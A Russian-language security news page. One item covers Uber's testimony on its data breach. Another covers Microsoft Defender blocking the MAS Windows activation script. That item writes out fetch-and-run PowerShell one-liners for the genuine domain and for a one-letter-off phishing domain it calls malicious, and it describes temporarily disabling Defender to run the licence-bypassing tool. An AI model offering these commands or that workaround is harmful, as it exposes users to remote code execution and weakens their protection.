Uber раскрывает подробности инцидента с утечкой

Uber раскрывает подробности инцидента с утечкой

Uber раскрывает подробности инцидента с утечкой

Джон Флинн, главный специалист по информационной безопасности Uber, по сообщениям СМИ, направил в комитет сената США письменные показания, в которых раскрываются подробности инцидента с крупнейшей утечкой данных клиентов.

Как сообщил господин Флинн, двое киберпреступников, похитивших данные, находились на территории штата Флорида в США и в Канаде. Также стало известно, что 25 миллионов клиентов, оказавшихся жертвами утечки, проживают в Америке, 4,1 миллиона из них являются водителями.

В прошлом году мы писали, что Uber заплатила хакерам $100 тысяч за молчание об утечке. Сейчас же представители компании признали, что это было ошибкой. Как отмечает Reuters, в процессе расследования инцидента удалось получить доступ к компьютеру злоумышленника, находившегося во Флориде. Благодаря этому следствие убедилось, что данные клиентов Uber были удалены.

Также напомним, что новый директор Uber умалчивал о кибератаке в течение двух месяцев. По данным Роскомнадзора, утечка данных клиентов Uber не затронула россиян.

А в этом году стало известно, что Uber игнорирует ошибку, сводящую на нет двухфакторную аутентификацию.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru